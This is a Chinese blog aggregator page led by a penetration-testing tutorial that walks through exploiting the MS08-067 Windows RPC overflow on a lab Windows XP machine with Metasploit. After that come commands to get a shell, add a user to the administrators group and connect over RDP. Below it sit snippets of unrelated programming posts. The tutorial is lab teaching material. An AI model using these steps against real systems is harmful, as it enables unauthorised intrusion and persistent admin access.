当前位置：首页 > news >正文

渗透测试基础(四) MS08-067 漏洞攻击

news 2026/2/8 23:51:58

1. 漏洞介绍

漏洞描述
- Microsoft Windows Server服务RPC请求缓冲区溢出漏洞Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞，远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，以SYSTEM权限执行任意指令。对于Windows 2000、XP和Server 2003，无需认证便可以利用该漏洞；对于Windows Vista和Server 2008，可能需要认证。
  补充：RPC请求：Windows RPC（Remote Procedure Call，远程过程调用）是一种用于网络中进程间通信的技术，它允许一个进程调用另一个进程中的方法，就像调用本地函数一样。RPC在Windows平台上被广泛使用，用于分布式系统和网络服务之间高效的数据交换和服务调用。在RPC中，客户端发送一个包含参数的请求消息到服务器，这个消息封装了调用的方法、参数以及结果的预期类型。服务器接收到请求后，执行相应的函数并返回结果给客户端。整个过程通常是透明的，因为RPC提供了底层的协议和数据序列化，使得开发者可以专注于业务逻辑，而不必关心网络通信的细节。
官方描述
- 连接：MS08-067漏洞描述

2. 环境说明

攻击机：kali
- IP：192.168.102.131
靶机：win XP
- IP：192.168.102.135

3. 信息收集

ping 查看靶机是否存活
nmap 查看靶机信息

4. 渗透攻击

4.1. 启动msf

命令：msfconsole

4.2. 查找漏洞

命令：search ms08-067

4.3. 使用攻击模块，设置攻击载荷，设置测试机IP，设置靶机IP

使用攻击模块，命令：use +攻击模块
设置测试机IP，命令如下：
- set rhost 靶机IP
- set lhost 测试机IP

4.4. 开始攻击

命令：run

可以发现成功建立

5. 顺利进入主机

5.1 查看权限

Win命令：getuid
Linux命令：whoami

5.2 进入shell

命令：shell
- 此时就进入当前权限下的shell

5.3 添加用户帐号

命令：net user 用户密码 /add

5.4 把刚刚创建好的用户添加到管理员组

命令：net localgroup administrators 用户 /add

5.5 远程登录到XP系统

命令为：rdesktop 192.168.102.135
- 前提需要让靶机支持被远程连接，做如下配置
rdesktop 192.168.102.135 远程连接

5.6 登录到XP系统，查看攻击是否生效

打开CMD查看刚刚创建的用户是否添加到管理员组

渗透测试基础(四) MS08-067 漏洞攻击

1. 漏洞介绍漏洞描述 Microsoft Windows Server服务RPC请求缓冲区溢出漏洞Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞，远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，以SYSTEM权限执行任意指令。…...

编程日记 2024/6/20 14:51:28

vmware 虚拟机保留数据扩展C盘

1，在默认安装系统的时候，VMWARE一般给C盘50G，很多人想着够用了，但是后面慢慢的安装各种大型软件，游戏，才发现，悔时已晚。 2，有很多人虚拟机其实就是拿来游戏多开，但是当…...

编程日记 2024/6/20 14:50:26

vscode cmake c++ include 设置

在这里设置编译器路径，include路径等等。一个奇怪的现象是同一项目放在VS中可以cmake生成，并正常运行，但是放在VSCODE中cmake生成时会报错，如iostream、limits等头文件找不到。当在VS中运行执行完成调试后，在运行VSC…...

编程日记 2024/6/20 14:48:23

2024-06-19 高等数学（统计学和概率论-高等工科数学）

学习数学时，有效的笔记方法可以帮助你更好地理解和记忆概念、公式和解题技巧。下面是一个数学笔记的基本模本，你可以根据自己的需求进行调整： 1. **标题**：写上日期和课程名称，例如“2024-06-19 高等数学”。 2. **课…...

编程日记 2024/6/20 14:45:13

idea 创建properties文件，解决乱码

设置properties文件编码点击file->Settings File Encodings->设置utf-8 重新创建.properties文件才生效...

编程日记 2024/6/20 14:44:09

树莓派4B学习笔记11：PC端网线SSH连接树莓派_网线连接请求超时问题解决

今日继续学习树莓派4B 4G：（Raspberry Pi，简称RPi或RasPi） 本人所用树莓派4B 装载的系统与版本如下: 版本可用命令 (lsb_release -a) 查询: Opencv 版本是4.5.1： 今日学习使用网线连接树莓派，网线可以提供更…...

编程日记 2024/6/20 14:43:03

适合营销的叙事可视化

背景数据可视化与数据故事化的差异和相似点，以及它们如何协同工作，将你的数据转化为清晰、简洁、可操作的信息，以便您的组织使用。什么是数据可视化？ 数据可视化通过图像传达信息——这是你所收集数据的视觉表示。通过提供原…...

编程日记 2024/6/20 14:42:01

Spring Cloud全家桶（上）【Nacos、OpenFeign、LoadBalancer、GateWay、金丝雀灰色发布】

0.零基础入门微服务实战课 1.微服务和 Spring Cloud1.1 什么是微服务？1.2 什么是 Spring Cloud？1.3 微服务 VS Spring Cloud 2.为什么要学微服务？3.Spring Cloud 组件介绍1.什么是 Nacos?1.1 Nacos 功能1.1.1 配置中心1.1.2 注册中心 1.2 Na…...

编程日记 2024/6/20 14:38:48

GPRS与4G网络：技术差异与应用选择

在移动通信的发展历程中，GPRS（General Packet Radio Service）和4G（Fourth-Generation）技术都扮演着举足轻重的角色。虽然两者都旨在提供无线数据传输服务，但在数据传输速率、延迟和覆盖范围等方面&#xff…...

编程日记 2024/6/20 14:37:42

【Spring】1. Maven项目管理

📚博客主页：爱敲代码的小杨. ✨专栏：《Java SE语法》 | 《数据结构与算法》 | 《C生万物》 |《MySQL探索之旅》 |《Web世界探险家》 ❤️感谢大家点赞👍🏻收藏⭐评论✍🏻，您的三连就是我持续更…...

编程日记 2024/6/20 14:35:38

工业制造领涉及的8大常见管理系统，如mes、scada、aps、wms等

在工业生产和制造领域有一些常见的管理系统，很多小伙伴分不清，这次大美B端工场带领大家了解清楚。 MES（Manufacturing Execution System，制造执行系统）： MES是一种用于监控、控制和优化生产过程的软件系统…...

编程日记 2024/6/20 14:34:35

Lianwei 安全周报|2024.06.17

新的一周又开始了，以下是本周「Lianwei周报」，我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件，保证大家不错过本周的每一个重点！ 政策/标准/指南最新动态 01 IDC：2024 第一季度中国安全硬件市场规模…...

编程日记 2024/6/20 14:33:33

海量数据处理利器 Roaring BitMap 原理介绍

作者：来自 vivo 互联网服务器团队- Zheng Rui 本文结合个人理解梳理了BitMap及Roaring BitMap的原理及使用，分别主要介绍了Roaring BitMap的存储方式及三种container类型及Java中Roaring BitMap相关API使用。一、引言在进行大数据开发时，…...

编程日记 2024/6/20 14:31:21

Javaweb登录校验

登录校验 JWT令牌的相关操作需要添加相关依赖 <dependency><groupId>io.jsonwebtoken</groupId><artifactId>jjwt</artifactId><version>0.9.1</version> </dependency>一、摘要场景：当我们想要访问一个网站时&am…...

编程日记 2024/6/20 14:29:17

vxe-table 列表过滤踩坑_vxe-table筛选

但是这个过滤输入值必须是跟列表的值必须一致才能查到，没做到模糊查询的功能，根据关键字来过滤并没有实现。下面提供一下具体实现方法：（关键字来过滤） filterNameMethod({ option, row }) {if (row.name.indexOf(op…...

编程日记 2024/6/20 14:28:15

计算机网络：网络层 - IP数据报的转发

计算机网络：网络层 - IP数据报的转发基于终点转发最长前缀匹配二叉线索树路由表特殊路由特定主机路由默认路由 IP多播基于终点转发路由器转发报文时，是通过报文中的目的地址字段来转发的，也即是说路由器只知道终点的IP地址，根…...

编程日记 2024/6/20 14:27:14

颠覆与创新：探寻Facebook未来的发展路径

Facebook，这个曾经引领社交网络革命的巨头，在如今竞争激烈的科技市场中，正面临着前所未有的挑战和机遇。如何在不断变化的数字世界中保持竞争力，成为业界领先者，这是摆在Facebook面前的重要课题。本文将探寻Facebook未…...

编程日记 2024/6/20 14:26:12

太湖远大毛利率下滑：研发费用率远低同行，募投项目合理性疑点重重

《港湾商业观察》黄懿 6月20日，浙江太湖远大新材料股份有限公司（以下简称“太湖远大”，873743.NQ）即将迎来过会。 2023年11月30日，太湖远大所提交的上市申请材料正式获北交所受理，保荐机构为招商证券&…...

编程日记 2024/6/20 14:23:09

赶紧收藏！2024 年最常见 20道设计模式面试题（八）

上一篇地址：赶紧收藏！2024 年最常见 20道设计模式面试题（七）-CSDN博客十五、模板方法模式是如何在父类中定义算法框架的？ 模板方法模式通过在父类（通常是一个抽象类）中定义算法的骨架&#x…...

编程日记 2024/6/20 14:19:02

JAVA学习-练习试用Java实现“比较版本号”

问题： 给定两个版本号 version1 和 version2 ，请比较它们。版本号由一个或多个修订号组成，各修订号由一个 . 连接。每个修订号由多位数字组成，可能包含前导零。每个版本号至少包含一个字符。修订号从左到右编号，…...

编程日记 2024/6/20 14:18:01

uniapp微信小程序视频实时流+pc端预览方案

方案类型技术实现是否免费优点缺点适用场景延迟范围开发复杂度WebSocket图片帧定时拍照Base64传输✅ 完全免费无需服务器纯前端实现高延迟高流量帧率极低个人demo测试超低频监控500ms-2s⭐⭐RTMP推流TRTC/即构SDK推流❌ 付费方案 （部分有免费额度&#x…...

编程新知 2026/1/31 6:12:33

Android第十三次面试总结（四大组件基础）

Activity生命周期和四大启动模式详解一、Activity 生命周期 Activity 的生命周期由一系列回调方法组成，用于管理其创建、可见性、焦点和销毁过程。以下是核心方法及其调用时机： onCreate() 调用时机：Activity 首次创建时调用。…...

编程新知 2025/10/15 15:07:34

GitHub 趋势日报 (2025年06月06日)

📊 由 TrendForge 系统生成 | 🌐 https://trendforge.devlive.org/ 🌐 本日报中的项目描述已自动翻译为中文 📈 今日获星趋势图今日获星趋势图 590 cognee 551 onlook 399 project-based-learning 348 build-your-own-x 320 ne…...

编程新知 2026/1/29 5:21:31

[ACTF2020 新生赛]Include 1(php://filter伪协议)

题目做法启动靶机，点进去点进去查看URL，有 ?fileflag.php说明存在文件包含，原理是php://filter 协议当它与包含函数结合时，php://filter流会被当作php文件执行。用php://filter加编码，能让PHP把文件内容…...

编程新知 2026/1/30 2:28:32

SQL Server 触发器调用存储过程实现发送 HTTP 请求

文章目录需求分析解决第 1 步：前置条件，启用 OLE 自动化方式 1：使用 SQL 实现启用 OLE 自动化方式 2：Sql Server 2005启动OLE自动化方式 3：Sql Server 2008启动OLE自动化第 2 步：创建存储过程第 3 步：创建触发器扩展 - 如何调试？第 1 步：登录 SQL Server 2008第 2 步…...

编程新知 2025/9/11 6:56:11